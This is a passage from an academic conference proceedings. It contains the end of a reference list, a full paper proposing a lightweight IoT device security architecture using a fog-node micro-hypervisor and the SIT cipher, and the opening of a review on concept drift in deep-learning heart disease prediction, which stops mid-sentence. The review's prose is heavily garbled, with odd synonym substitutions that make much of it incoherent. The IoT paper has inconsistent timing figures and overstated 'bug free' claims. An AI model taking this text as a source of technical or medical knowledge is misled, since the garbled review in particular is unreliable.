14. Alrashdi, I., Alqazzaz, A., Aloufi, E., Alharthi, R., Zohdy, M., & Ming, H. (2019). Ad-iot:
Anomaly detection of iot cyber attacks in smart city using machine learning. In 2019 IEEE 9th
Annual Computing and Communication Workshop and Conference (CCWC) (pp. 0305–0310).
IEEE.
15. Garg, S., Kaur, K., Batra, S., Kaddoum, G., Kumar, N., & Boukerche, A. (2020). A multi-stage
anomaly detection scheme for augmenting the security in IoT-enabled applications. Future
Generation Computer Systems, 104, 105–118.
16. Luo, T., & Nagarajan, S. G. (2018). Distributed anomaly detection using autoencoder neural
networks in wsn for iot. In 2018 IEEE International Conference on Communications (ICC)
(pp. 1–6). IEEE.
17. Nguyen, T. D., Marchal, S., Miettinen, M., Fereidooni, H., Asokan, N., & Sadeghi, A. R.
(2019). DÏoT: A federated self-learning anomaly detection system for IoT. In 2019 IEEE 39th
International Conference on Distributed Computing Systems (ICDCS) (pp. 756–767). IEEE.
18. Ukil, A., Bandyoapdhyay, S., Puri, C., & Pal, A. (2016). IoT healthcare analytics: The
importance of anomaly detection. In 2016 IEEE 30th international conference on advanced
information networking and applications (AINA) (pp. 994–997). IEEE.
19. Raj, R. J. S., Shobana, S. J., Pustokhina, I. V., Pustokhin, D. A., Gupta, D., & Shankar, K.
(2020). Optimal feature selection-based medical image classification using deep learning model
in internet of medical things. IEEE Access, 8, 58006–58017.
Novel IoT End Device Architecture
for Enhanced CIA: A Lightweight
Security Approach

Prateek Mishra, Sanjay Kumar Yadav, Ravi Kumar Sachdeva,


and Rajesh Tiwari

Abstract Security is a burning issue in wearable IoT end devices. The exponen-
tial growth of IoT has deligated processing and storage from cloud to wearable end
devices. Due to resource constrained nature of IoT end devices, balancing lightweight
and implementing security are a challenge. In this paper, lightweight within IoT
end devices is ensured by shifting virtualization over fog node and implementing
lightweight secure internet of things (SIT) cryptographic algorithm using Arduino
IDE over ESP32. Stable chain of trust creates robust trusted execution environ-
ment (TEE) to ensure security within IoT devices. Inter IoT devices security is
ensured by encrypted one time password (OTP) using SIT algorithm. SIT algorithm
is lightweight since it consumes key size of 64 bits and 22 bytes of run time memory
with the total encryption and decryption execution time 0.375 ms and is optimum
for our proposed lightweight IoT end device architecture.

Keywords Encrypted one time password · Lightweight SIT algorithm · Stable


chain of trust · Wearable IoT end devices

1 Introduction

Internet of Things (IoT) architecture comprised of cloud core, fog nodes and end
devices [1]. Wearable end devices have least processing and storage and communi-
cate with cloud core via fog node. With the growth of IoT systems processing and
storage has been deligated from the cloud to the edge hence increased attack over
end devices [11] resulting into over-architectured and vulnerable IoT End devices.
A typical Type-1 hypervisor based IoT end device architecture [15] is shown in

P. Mishra (B) · S. K. Yadav


Sam Higginbottom University of Agriculture, Technology and Science, Allahabad, India
R. K. Sachdeva
Asia Pacific Institute of Information Technology(APIIT) SD Indıa, Panipat, India
R. Tiwari
United College of Education, Greater Noida, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 147
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_12
148 P. Mishra et al.

Fig. 1 Type-1: Hypervisor


based end device with high
attack volume. Source IJRTE
ISSN: 2277–3878, Volume-8
Issue-6, March 2020, p. 5712

Fig. 1. Since hypervisor is at level 1 therefore this type of device is known as Type-1
hypervisor based IoT end device. This architecture comprises of bare metal at level
0 for processing and storage. A thin software layer hypervisor at level 1 creates
virtualization and monitors virtual machine’s behavior also provides temporal and
spatial isolations at run time. Virtual machine comprised of guest OS(s) at level 2
and virtual applications at level 3. An inter virtualization extension technology (VTx)
implements sharing of processors and footprints to the VMs [8]. All the trusted hard-
wares and softwares within the IoT end devices form trusted computing base (TCB)
hence chain of trust (CoT), followed by trusted execution environment (TEE) to
establish guranteed security in terms of confidentiality, integrity and authenticity
(CIA).
The bulky TCB components in wearable devices incur overweight and complexity
followed by more bugs, vulnerabilities and overheads. The more area exposed [2,
7] to the untrusted external world the more unsecure thus breach of trust therefore
week TEE [11]. The protection of TCB is ensured by minimum size and minimum
complexity hence TCB minimization is mandatory for lightweight and secured IoT
end devices [9]. As shown in Fig. 1, higher layers of IoT end device architecture
are the easiest target for threats with high-attack volume with minimum efforts and
minimum resources due to direct interaction with the external untrusted world, but
lower layers of IoT end devices require huge efforts and resources [3] thus difficult
to attack due to uninterrupted secure boot process.
Therefore in our proposed architecture lightweight micro (µ)-hypervisor [4] has
been implemented on fog node to shift virtual machines from the IoT end devices
to the fog nodes in order to minimize the TCB components resulting into secured
IoT end devices. Lightweight SIT algorithm implemented due to least possible code
Novel IoT End Device Architecture … 149

size since IoT end devices are characterized by low storage, low-runtime memory
and requirements of least execution time. Thus, lightweight and trusted components
are having less complexity hence minimum or no bugs and also support minimum
latency so as to ensure security in terms of confidentiality, integrity, authenticity
(CIA). The external trusted world devices must only be allowed to interact with
trusted IoT edge devices due to inevitable security requirements. Due to resource
limitations in the IoT end devices we need lightweight TCB components in terms of
minimum footprint, minimum latency [9, 10].
The objective of this paper is to propose a novel lightweight architecture with
the implementation of a lightweight cryptographic algorithm so as to enhance CIA.
The contribution of the rest of the paper is that Sect. 2 summarizes literature review.
Section 3 discusses the need of lightweight cryptographic algorithm. Sections 4 and 5
present novel lightweight architecture and its functionality. Section 6 presents results
and discussion. Section 7 concludes the paper.

2 Literature Review

• IoT end devices security holes could not be properly understood [12].
• IoT device architecture in [5] claims lightweight, but over-architectured as
compared to our proposed one due to hypervisor size approx. 13 K and hyper-
visor based virtualization at IoT end devices. It has no remote updates, no secured
terminal access, no provision against internal bugs and vulnerabilities within TCB
and partial confidentiality, integrity, authenticity.
• IoT device architectures in [6, 7, 13] is over-architectured due to no lightweight
considerations hence unsecured. These architectures have no provisions for side
channel attack and have partial confidentiality, integrity but no authenticity.
• Security mechanisms evaluated in [19] conclude that key size, number of rounds
and word size increases execution time of cryptographic algorithm.
• The lesser is the key size of the crytographic algorithm the faster will be the
algorithm. Since research papers [16–19] use 128 bit key size sufficient to slow
down execution process.
• Usman et al. [14] mention that implementation of conventional computationally
expensive security algorithms will result in the hindrance on the performance of
wearable devices.

3 The Need of Lightweight Cryptographic Algorithm

An optimal lightweight cryptographic algorithm is necessary to develop a secure


and lightweight IoT architecture. Our proposed architecture uses the secure internet
of things (SIT) [14] symmetric key block cipher algorithm. The encryption and
decryption in SIT algorithm are composed of five rounds hence require five unique
150 P. Mishra et al.

Table 1 Comparisons of cryptographic algorithms


Cipher Key size (bits) Code size (bytes) RAM (bytes) Cycles (enc) Cycles (dec)
AES [16] 128 1570 – 2739 3579
HIGHT [17] 128 5672 – 2964 2964
IDEA [17] 80 596 – 2700 15393
KLEIN [18] 80 1268 18 6095 7658
TEA [18] 128 648 24 7408 7539
PRINCE [18] 128 1574 24 3253 3293
SIT [14] 64 826 22 3006 2984

keys. These keys are used to encrypt and decrypt communication between IoT edge
and fog node.
Table 1 shows the comparison between various cryptographic algorithms. Key
sizes are in bits, code sizes and RAM are in bytes. The cycles involve encryption
(enc), decryption (dec) and key expansions to secure the keys involved in encryption,
decryption. As mentioned in table SIT uses optimal resources of 64 bits key, 826 bytes
code, 22 byte RAM. The encryption and decryption are also faster and better than
the other cryptographic algorithms. Thus, SIT is optimal for wearable IoT devices.

4 Novel Lightweight Architecture

Novel proposed architecture comprised of three components. (i) Fog node (ii) Web
Interface (iii) IoT end device. The description of the architecture is in Sects. 4.1, 4.2
and 4.3.

4.1 Trusted Fog Nodes with CoT and TEE

As shown in Fig. 2 fog node is having (i) Bare Metal at the bottom with one time
memory having BL with RPK. When powers on boot process ensures CIA. The
authentication from lower to upper layer continues till all the softwares are uploaded
thus chain of trust (CoT) is built hence robust trusted execution environment (see R.
TEE in Fig. 2) is established. (ii) µ-visor (see Fig. 2) lies in the middle between bare
metal and virtual machine. µ-visor is the thinnest software layer lesser in size in terms
of lines of codes and consumes lesser resources compared to traditional hypervisors
and most feasible for wearable lightweight IoT end devices. µ-visor creates virtual
machines (VM) at the top layer and monitors VM’s behavior. µ-visor also provides
spatial and temporal separation at run time through inters virtualization extension
(VTX). If VM does any spoilage µ-visor blocks that VM and issues alert for further
Novel IoT End Device Architecture … 151

Fig. 2 Fog node with µ-visor and TEE

necessary actions. Additionally, here µ-visor generates one time password (OTP)
and encrypts OTP.
Encrypted OTP is sent to an IoT end device via transceiver when an end device tries
to connect with fog node. Every VM consists of signature (see Fig. 2) to register new
IoT end devices and connects already registered IoT end devices. After registration
every fog node will have user id and password along with device id of all the end
devices. Every IoT end device will also store its own the user id and password along
with device id. If already registered IOT end device want to connect to the fog node
then that end device will send user id and password along with device id to the fog
node. Fog node thereafter will search the respective user id and password along with
device id in its own database. If search successful fog node issues one time password
(OTP) to the respective IOT end device. After OTP verification respective IoT end
device gets connected to the fog node. Once connection is established VM starts
receiving data from that IOT end device. To identify data source received data is then
given to data fragmentation and device identification (see Data Frag. & Device ID in
Fig. 2) block for (1) identification of device using frames coming from respective IoT
end device (See Data Frame in Fig. 3–6). (2) Identification of device using device
ID (see Device ID in Fig. 3). Data decryption block (See D. DEC. in Fig. 4) then
decrypts data encrypted at IoT end so as get the original data. Finally, data processing
block (See D. Pro. in Fig. 4) ensures delivery of the processed data to external world.
Watch dog stored in one time memory continuously runs and keeps track of any
152 P. Mishra et al.

Fig. 3 Secured IoT end


device architecture

spoilage if any such malignancy is detected an alert is issued for further necessary
actions hence a bug free system. A bug free system will be more trusted and establish
stable CoT resulting into robust TEE hence trusted fog node.

4.2 Web Interface(WI)

As shown in Fig. 2, WI allows communication between IoT end device and fog
node. WI has device id and password block to register and connect an IoT end device
with fog node. WI also has OTP block to authenticate IoT end device before data
transmission to the fog node.

4.3 IoT End Device

As shown in Fig. 3, bare metal has same boot features as in the fog node (see Fig. 2)
thereafter third party signature at the software layer is examined and authenticated
by boot loader [see Fig. 3(2)] then software layer is uploaded [see Fig. 3(3)] thus
stable chain of trust (CoT) creates robust TEE resulting into trusted IoT end device.
Software layer comprises of (i) Sensor data block to store sensed data in data buffer
[see Fig. 3(4)]. (ii) Secure internet of things (SIT) encryption block encrypts sensed
data using SIT lightweight algorithm. (iii) Data frame block converts encrypted
data into data frames by adding device id in the header [see Fig. 3(5)]. (iv) Data
transmission block transmits data frames to the fog node via transceiver using web
Novel IoT End Device Architecture … 153

Fig. 4 Secured data transmission

interface [see Fig. 3(7)]. (v) SIT OTP decryption block [see Fig. 3(8)] decrypts
OTP from fog node using SIT decryption algorithm and is further sent for device id
verification via web.

5 Secured Data Transmission

As shown in Fig. 4 in the beginning when an edge device is ready user will provide 64-
bit cipher key [see Fig. 4(1)]. This key is stored in write once memory and generates
the unique keys for encryption [as shown in Fig. 4(2)]. Thereafter, sensor data in the
data buffer is encrypted by SIT encryption algorithm [14] using this unique key [as
mentioned in Fig. 4(3)]. The encrypted data is then converted into data frames [as
presented in Fig. 4(4)] where device id is included in the header of the encrypted
154 P. Mishra et al.

data packet. The encrypted data packet is sent to the fog node through the transceiver
[as given in Fig. 4(5)]. Fog node receives data packets [see Fig. 4(5)] and fragments
them to obtain encrypted data and device ID of IoT end device. Fog node here checks
whether the device ID is verified or not [see Fig. 4(6)]. If not verified [see Fig. 4(7)]
ID is passed to the web interface for verification [see Fig. 4(8)]. Now user will
provide 64-bit cipher key for the verification of IoT end device id at the fog node
[see Fig. 4(9)]. Verification of IoT end device id is done only when first time IoT end
device will connect with fog node. Once cipher key is obtained fog node’s µ-visor
will generate OTP [see Fig. 4(10)]. This OTP is encrypted using SIT algorithm [see
Fig. 4(11)] and is sent to the transceiver for transmission to the edge device [see
Fig. 4(12)]. IoT edge device receives the encrypted OTP and passes it to the OTP
decryption block where it is decrypted using SIT decryption and its unique keys
[see Fig. 4(13)]. The decrypted OTP is then passed to the user [see Fig. 4(14)]. User
takes this OTP and enters it into the web interface for verification [see Fig. 4(15)].
If received OTP matches with generated OTP, the device ID and the corresponding
64-bit cipher text is stored in a secure storage at the fog node for latter verification
[see Fig. 4(16)]. This completes the set up. Next time when IoT end device sends
data then fog node will fetch the cipher key from the secure storage based on device
ID [see Fig. 4(17)] to generate the unique key [see Fig. 4(18)] so as to decrypt the
data using the SIT decryption algorithm [see Fig. 4(19)].
The decrypted data is then sent to the data processing block of the fog node
for further processing [see Fig. 4(20)]. This concludes how the SIT cryptographic
algorithm would work on the proposed lightweight architecture and thus making it
secure.

6 Results and Discussion

To ensure, lightweight host OS was avoided both at fog and at IoT edge. Lightweight
µ-hypervisor implemented only at fog node but not at IoT edge device hence virtual-
ization transferred from IoT edge to fog node. Transfer of virtualization minimized
TCB area hence minimized resource utilization, minimized memory and enhanced
performance thus reduced attack surface at IoT end device. A bug free TCB and
authentication between TCBs creates stable chain of trust (CoT) resulting into robust
TEE (R.TEE). SIT encrypted OTP is sent by fog to IoT end device during login
ensures CIA. SIT algorithm consumes only about 22 bytes of memory with encryp-
tion and decryption execution time 0.188 and 0.187 ms, respectively. µ-hypervisor
and software consumed about 32.75% of the total 4 MB flash and 6.30% of 520 KB,
i.e., 32.77 KB SRAM is thus total footprint 39.05%. Based on Table 1 comparison
graph of algorithms in Fig. 5 shows that SIT is best in terms of encryption, decryption
cycle time and code size hence best for lightweight secured fog and IoT end device.
Novel IoT End Device Architecture … 155

Fig. 5 Comparisons of algorithms

7 Conclusion

The proposed novel IoT architecture implements stable chain of trust hence robust
trusted execution environment for intra IoT devices security. Trusted connection
established between IoT end devices and fog nodes before data transmission. End
device verification is performed using encrypted OTP to guarantee confidentiality
(OTP leakage not possible), integrity (OTP change not possible) and authenticity (end
device verification by user of the device). The implementation of lightweight SIT
cryptographic algorithm in the proposed novel architecture done using Arduino IDE
over ESP32. The results confirm that lightweight novel IoT architecture consumes
1.31 MB of flash and 32.77 KB SRAM. SIT cryptographic algorithm consumes 22
bytes of memory and faster encryption and decryption of 0.376 ms. Thus the proposed
novel architecture guarantees a lightweight security in the lightweight novel IoT
architecture.

References

1. Zhang, P. Y., Zhou, M. C., & Fortino, G. (2018). Security and trust issues in fog computing:
A survey. Future Generation Computer Systems, 88, 16–27. https://doi.org/10.1016/j.future.
2018.05.008
2. Dall, C., & Nieh, J. (2014). KVM/ARM. ACM SIGPLAN Notices, 333–348. https://doi.org/
10.1145/2644865.2541946.
3. Cheruvu, S., Kumar, A., Smith, N., & Wheeler, D. M. (2019). Demystifying Internet of Things
Security: Successful IoT Device/Edge and Platform Security Deployment (1st ed.). Apress.
https://doi.org/10.1007/978-1-4842-2896-8.
4. Iqbal, A., Sadeque, N., & Mutia, R.I. (2010). An Overview of microkernel, hypervisor and
microvisor virtualization approaches for embedded systems.
5. Tiburski, R. T., Moratelli, C. R., Filho, S. J., Neves, M. V., Matos, E. D., Amaral, L., &
Hessel, F. (2019). Lightweight security architecture based on embedded virtualization and
trust mechanisms for IoT edge devices. IEEE Communications Magazine, 57, 67–73.
156 P. Mishra et al.

6. Pinto, S., Gomes, T., Pereira, J., Cabral, J., & Tavares, A. (2017). IIoTEED: An enhanced,
trusted execution environment for industrial IoT edge devices. IEEE Internet Computing, 21,
40–47.
7. Dai, W., Jin, H., Zou, D., Xu, S., Zheng, W., Shi, L., & Yang, L. T. (2015). TEE: A virtual DRTM
based execution environment for secure cloud-end computing. Future Generation Computer
System, 49, 47–57.
8. Mishra, P., & Yadav, S. K. (2020) Threats and vulnerabilities to IoT end devices architecture and
suggested remedies. International Journal of Recent Technology and Engineering. 8(6):5712–
5718. https://doi.org/10.35940/ijrte.f9469.038620
9. Amoroso, E. G. (2011). Cyber attacks: Awareness. Network Security, 2011(1), 10–16. https://
doi.org/10.1016/s1353-4858(11)70005-8
10. Mounika, M., & Chinnaswamy, C. N. (2016). A comprehensive review on embedded
hypervisors. IJARCET., 5(5), 1546–1550.
11. Cerdeira, D., Santos, N., Fonseca, P., & Pinto, S. (2020). SoK: Understanding the prevailing
security vulnerabilities in trust zone-assisted TEE systems. IEEE Symposium on Security and
Privacy (SP), 2020, 1416–1432.
12. Shapsough, S., Aloul, F., & Zualkernan, I. (2018). Securing low-resource edge devices for IoT
systems. International Symposium in Sensing and Instrumentation in IoT Era (ISSI), 2018,
1–4.
13. Guan, L., Liu, P., Xing, X., Ge, X., Zhang, S., Yu, M., & Jaeger, T. (2017). TrustShadow:
Secure execution of unmodified applications with ARM TrustZone. In Proceedings of the 15th
Annual International Conference on Mobile Systems, Applications, and Services.
14. Usman, M., Ahmed, I., Aslam, M., Khan, S., & Shah, U. (2017). SIT: A lightweight encryption
algorithm for secure ınternet of things. ArXiv, abs/1704.08688.
15. Jones, M. (2013). Virtualization for embedded systems The how and why of small-device
hypervisors.
16. Poettering, B. (2007) Rijndael furious AES-128 ımplementation for AVR devices (2007). http://
point-at-infinity.org/avraes/.
17. Eisenbarth, T., Gong, Z., Güneysu, T., Heyse, S., Indesteege, S., Kerckhof, S., Koeune, F., Nad,
T., Plos, T., Regazzoni, F., Standaert, F., & Oldenzeel, L.V. (2012). Compact ımplementation
and performance evaluation of block ciphers in ATtiny devices. AFRICACRYPT.
18. Koo, W., Lee, H., Kim, Y.H., & Lee, D. (2008). Implementation and analysis of new lightweight
cryptographic algorithm suitable for wireless sensor networks. In 2008 International Confer-
ence on Information Security and Assurance (isa 2008) (pp. 73–76).
19. Guimarães, G., Souto, E., Sadok, D., & Kelner, J. (2005). Evaluation of security mechanisms
in wireless sensor networks. Systems Communications, 2005, 428–433.
Addressing Concept Drifts Using Deep
Learning for Heart Disease Prediction:
A Review

Ketan Sanjay Desale and Swati V. Shinde

Abstract Heart disease is definitely among the many most significant triggers of
morbidity and fatality amid the populace among the globe. Prediction of cardiac
disease can be considered as one particular among the most crucial topics in the
sector of medical info evaluation. The quantity of data through the medical industry
is very large. Deep learning becomes the huge range of natural medical care data
straight to data which usually may support to identify possibilities and forecasts. This
paper reveals the novel algorithm and performance methodology that can forecast
the heart disease by ways of CNN modeling. The parameters evaluation will be
done for accuracy, sensitivity, specificity, and positive prediction value (PPV). Such
parameters can be used in a user-friendly manner by doctors to trace out the possibility
of diseases.

Keywords Heart disease · Deep learning · Concept drift · ECG

1 Introduction

Machine learning [1, 2] makes use of historic data to determine patterns that show
dangerous behavior in inbound data channels. Pertaining to several functions of
machine learning, where these kinds of patterns possibly perform certainly not alter
or perhaps transform gradually through period, the removal of patterns via the recent
to forecast long-term events is usually not a trigger for challenge [3, 4].
The real-world data are normally non-stationery. In many difficult data evaluation
uses, data develop throughout period and need to end up being examined in near
real time [5]. This triggers complications since the forecasts may turn into much less
correct as the point in time goes by or possibilities to enhance the precision may be

K. S. Desale (B) · S. V. Shinde


PCET’s Pimpri Chinchwad College of Engineering, Pune, India
e-mail: ketan.desale@pccoepune.org
S. V. Shinde
e-mail: swati.shinde@pccoepune.org

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 157
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_13
158 K. S. Desale and S. V. Shinde

skipped. Concept drift relates to scenario in the event that the relationship among
the insight data and the focus on shifting, that any model is usually attempting to
alterations overtime. Drifts are categorized improvements straight to both temporary
and long term [6]. Temporary drifts will be nothing at all however, the switch will get
show up at optimum period and so after that, it solves the method whereas Long term
Drifts happen to be it steadily shifts the entire process which interferes with the event
records while operating the features [7]. In pattern identification, any event is known
as covariate shift and dataset change. In signal control, the occurrence is alluded to as
non-stationary. Changes in underpinning data manifest on account of the changing
individualized motivations, variations in populace, hostile actions or perhaps they
can end up being linked to a complicated element of the situations [8, 9].
The challenge of concept drift is certainly of strengthening significance as a grow-
ing number of data are structured in the mode of data streams alternatively as opposed
to stationary sources, and it is impractical to foresee that data allocation stays steady
through a prolonged time frame. It is not astonishing that the issue of concept drift
is analyzed in different research areas including however, absolutely not limited to
pattern mining, machine learning and data mining, data channels, data recuperation,
and so recommended systems [10].
Several techniques intended for identifying and managing concept drift are gen-
erally recommended in investigation literature, and so several of them feature cur-
rently and validated their particular capabilities in a huge area concerning applica-
tion domains. A further circumstance is learning through the occurrence of obscured
parameters. Individual modeling is certainly among the lots of preferred learning
functions, exactly where the learning strategy constructs a unit of the individual
goals, which obviously are certainly not visible and can transform occasionally [12].
Drift likewise develops during monitoring tasks and predictive service. Learning the
patterns is among a model just where degradation or perhaps decay of technical por-
tions arises eventually. Concept drift is utilized as a universal terminology to explain
computational challenges with changes over time. Such alterations might be of many
distinct aspects and so certainly, there are several categories of functions which usu-
ally necessitate numerous adaptation approaches [13]. Numerous choices of tasks
may perhaps be needed based on the planned utility seeing that regression, position,
classification, uniqueness diagnosis, clustering, and program set exploration. Con-
jecture causes assurance about the future, or perhaps regarding undiscovered features
concerning the present. Predictions can be almost certainly the very prevalent usage
of data mining, and it addresses regression and distinction steps. Regression [14,
15] is ordinarily viewed as through requirements forecasting, reference scheduling
optimization, individual modeling, and so, generally, in functions, in which the key
target is to foresee potential patterns of prospects. Ranking can be a unique kind of
auguration, where partially ordering of alternate options is expected. Classification
can be a standard task in prognosis as well as decision services, for case in point,
antibiotic reluctance conjecture, fake data distinction, or perhaps fake news detection
[16]. Positioning is a general process in endorsement, data recuperation, record rat-
ing, and opinion learning programs areas. Regression and positioning classification
Addressing Concept Drifts Using Deep Learning … 159

are actually supervised learning duties, just where models are trained on cases, where
the ground truth is obtainable [17].
Furthermore, in medical domain uses, concept drifts (CD) requires to be consid-
ered as a predictive model for disease prediction, drug prediction, survival prediction,
etc. Hence, this paper signifies the research methodology intended for prediction of
human heart predicament in terms of several electrocardiogram (ECG) elements.

2 Literature Review

The importance of healthcare technology persists to expand swiftly in both client


as well as medical functions. Individuals progressively longing the potential to keep
an eye on and learn their own health and health care with the aid of the usage of
technology. Smart and well-being wristwatches are both equally preferred devices
utilized to accomplish now. Physicians are significantly utilizing such gadgets to rec-
ognize affected individual routine throughout much longer durations, alternatively
when compared to particular measurements in a medical environment [18]. Several
suggestions intended for upgrading learning models tend to be formulated. A few pri-
mary approaches can be prominent. Learning models may change progressively, for
example, models may be systematically retrained employing a sliding window among
predetermined specifications through the previous data [19]. Additionally, learning
units may implement set elements, to trigger a model revision. In general, statistical
transformation recognition assessments [20] are employed as triggers. Newly arriv-
ing data are consistently examined, in the event that variations are diagnosed, the
trigger provides an alert, and so adaptable events are applied.
In the event that a transformation is signaled, the old training data are reduced and
the unit is updated employing the recent data. Learning units can employ single units
as well as whole suit of models. Single model methods make use of merely a single
unit for decision setting up at a point in time. Immediately after the model is modified,
the previous one is completely removed. Ensembles, on the contrary, preserve a
few memories of different techniques. The outcomes of the trials reveal that the
recommended approach accomplished the maximum detection reliability and so the
minimum percentage of wrong alarms, rather than vital classification precision levels,
in fabricated datasets addressing distinct categories of drifts [21]. The conjecture
decisions will be crafted possibly fusing the votes casted by means of numerous
models or perhaps nominating the numerous appropriate model for the moment by
the group of existing models. Ensembles may be growing and also possess inducer
elements furthermore. Developing ensembles build and verify different units as fresh
data occur; the procedure pertaining to model collaboration is effectively restructured
based on the effectiveness. Ensembles by way of triggers proactively designate the
best trusted models to get decision making depending on the circumstance [22].
Consequently, the principle and trustworthiness for prompt prognosis of cardiac
conditions rely upon the strong and appropriate discovery of QRS complexes together
the fiducially areas through the electrocardiogram (ECG) stimulus. Irrespective of
160 K. S. Desale and S. V. Shinde

the different QRS detection algorithms informed in the literature, the evolution of a
productive QRS detector continues to be an issue in the medical ground.
Zero-crossing techniques are effective to prevent noises and so are specifically
practical for specific accuracy arithmetic. This diagnosis approach follows the effec-
tiveness as well as delivers a substantial level of discovery effectiveness also in very
deafening ECG signals. In this procedure, the starting up of a happening is discovered
when the abilities of the signal fit down below a signal adaptive tolerance while the
outcome is determined in the event that the signal goes up over the threshold. This
beginning and then end of the occurrence identify the bounds of the query process
meant for the eventual localization among the R-wave. In the event, nearby events are
temporally extremely close, and they are going to be merged straight to one particular
solitary event. The starting point of the combined event is the starting of the initial
event, and the closure of the merged occurrence is the outcome of the closing occur-
rence. The tolerance per phase applied for pinpointing the range of zero-crossings is
predetermined and so estimated empirically [23]. Author formulated a new approach
for QRS complex detection of ECG signals, employing particle swarm optimization
(PSO)-based adaptable filter (AF). In the recommended technique, the AF, struc-
tured on PSO, is utilized to create the element. A competent discovery algorithm
formulated with look backs to get neglected peaks [24].
At the time of different analysis, author carried out ECG signal preprocessing
and SVM structured arrhythmic beat distinction that are achieved to identify straight
to regular as well as unnatural matters. In ECG signal preprocessing, a detained
problem normalized LMS adaptable filter is used to obtain high-speed and poor
latency pattern by way of reduced computational features. Seeing that the signal
control approach is formulated for distant medical units, white noises extraction is
primarily targeted. Individual wavelet transform is employed with the preprocessed
signal meant for HRV element removal as well as machine learning approaches are
employed intended for accomplishing arrhythmic beat distinction [25]. Table 1 is
summarizing some of the ECG signal evaluation methods.
Author designed new version for PhysioNet/CinC challenge that aspires to encour-
age the refinement of prestigious algorithms to sort out regardless a concise single-
lead ECG logging reveals natural sinus rhythm, atrial fibrillation (AF), an alternative
rhythm, or perhaps is overly noisy to remain categorized. The procedure proclaimed
by author combines time details acquired via QRS detection by features via a stronger
process estimator and waveform aspects employing a random forest classer. Hence,
the objective of this research is to find out research gap as shown in Table 2 and
develop methodology for prediction with the classification of ECG elements.

3 Research Methodology

The heart disease continues to be among the significant triggers of fatality around
the world. The heart disease diagnosis is costly currently; consequently, it is vital
to foresee the issues of gaining heart disease because of specific boasts. The feature
Addressing Concept Drifts Using Deep Learning … 161

Table 1 Analysis of ECG signal evaluation methods


Ref. Author/year Journal Research
No. name
[26] Saurav et al./2018 ACM • Through this unique study, the author
suggested a temporal methodology implementing
deep recurrent neural networks (RNNs) for
time-series feature recognition to resolve issues
developed through unanticipated as well as
consistent alterations through typical patterns
• In the event that different data transforms into
obtainable status, the model is trained gradually,
and so is competent of aligning to the alterations
in the data syndication
• RNN is employed to generate forecasts among
the time series, as well as the conjecture glitches
are utilized to revise the RNN model combined
with the detection of anomalies as well as swap
elements. The transformation (drift) in usual
patterns is discovered utilizing significant
auguration error
[27] Steinberg et al./2019 Biosensors • The discovery concerning arrhythmic disorders
is brutal considering that of their particular
transitory, intermittent nature
• Typical solutions are narrowed through scanty
level of responsiveness. Wearable
electrocardiogram (ECG) receptors present a
substitute system for longstanding beat
monitoring
• The analysis is conducted by way of an aim to
figure out the signaling level of quality as well as
R-R exposure of a wearable unit contrasted to a
typical 3-lead Holter
[28] Zuo et al./2019 Springer • Time-series classification (TSC) is certainly a
significant element in time series investigation,
that may be utilized in therapeutic prognosis,
individuals movements identification,
commercial restoration, and so
• Commonly, built in Concept Drift in buffering
framework is overlooked even though training a
fixed model via an off-line data-set in TSC
Processing Time Series by way of realistic
evaluated data arriving in a continuous order
needs a solution of both approaches of Time
Series (TS) and Data Streams
162 K. S. Desale and S. V. Shinde

Table 2 Research gap


Ref. Author, year Existing method Research gap
no.
[29] Sahmoud et al., 2020 • Author developed • Only classification
dynamic multiobjective accuracy is focused
evolutionary algorithm with
ANN
• Four different dataset
generators used for testing
[30] Duda et al., 2020 • Author used traditional • Proposed method author
stochastic and batch-based applied the idea of boosting
methods and used the strategy to
train the neural network
based on mini-batches
• Aim of research is to • Only Wrongly Classified
accelerate the training of (OWC) approach is used
deep neural networks and no predictive model is
developed
• Bagging-based training
with drift detector
[31] Fedotov et al., 2019 • Mathematical model is • Morphological changes
proposed for simulating can be further evaluated
ECG signal using CNN for ECG
• Heart rate variability • There is a need of
considered as a base for application level
further evaluation development, training, and
validation
[32] Anugirba et al., 2019 • Multistage multiscale • QRS detection algorithms
mathematical morphology of DSP/microprocessor used
is developed for filtering
images
• Grayscale image • New algorithm
morphology is processed development can be done
using CNN framework

assortment strategies may be implemented as important approaches to cut down the


expense of analysis by deciding on the significant features [33]. Hence, the objective
of this research is to develop methodology for prediction with the classification of
ECG elements.
For suggested research, the input ECG database is going to be applied for dis-
tinction of heartbeats. The ECG wave is an intricate kind comprising P wave, QRS
wave, and T wave. As a preliminary proposed analysis, this will assess QRS com-
plex tentatively. For input database of ECG information, the group development will
be utilized to preprocess the input information and facts as per ECG wave factors.
Proposed research will undertake Python development with TensorFlow and keras
to keep and so program the dataset clusters. Clustering is required with discovering
Addressing Concept Drifts Using Deep Learning … 163

categories of observations with similar characteristics. To be able to do this, distance


is utilized to evaluate the likeness among couples of findings. Clusters of composition
are established by means of collection jointly circumstances that are alongside both
and even out of the occasions of various clusters. Hierarchical clustering approaches
bring about a structure that presents much more flexibleness as diverse alternatives
can be produced via the structure. The groups of data which usually are refined
through a clustering approach may also be unique. All these incorporate statisti-
cal data and specific data. The usage of models completely cuts down computational
overheads. Investigation of electrocardiogram (ECG) signal presents precious details
regarding the heart difficulties of the patient to the clinicians.
The proposed research methodology framework is shown in Fig. 1 which can be
useful for analyzing concept drifts in process mining. The framework identifies the
following steps:
(1) Preprocessing: As an initial function, arrhythmia dataset is going to be input.
Additionally, for particular ECG image refinement, we can extract the R-component
to locate out peaks. This unique step belongs in identifying the features among any
records through an occurrence log. Certainly, there are four features that define the
control-flow point of view of procedure occasions in an event log. Based on the
target of evaluation, we may determine supplemental features, e.g., in the event that
we are interested in examining variations in reference perception, we can reflect
on aspects based on communal systems as a ways of characterizing the occurrence
record. Moreover, to feature extraction, this kind of stage likewise consists of feature
assortment. Feature assortment is necessary in the event that the quantity of features
extracted is huge.
(2) CNN Processing: A CNN is composed of three key units: convolution layer,
pooling layer, as well as distinction layer. In the convolution layer, the feature map
was produced by making use of a filtration kernel to generate the convolution integral
of the input data initialization action, therefore maximizing elegance. Through the
pooling layer, the feature map has minimized and constrained any proportions of
input data [34]. Finally, the category layer is performed the absolute discrimination
of the source data by means of implementing the fully connected network system. At
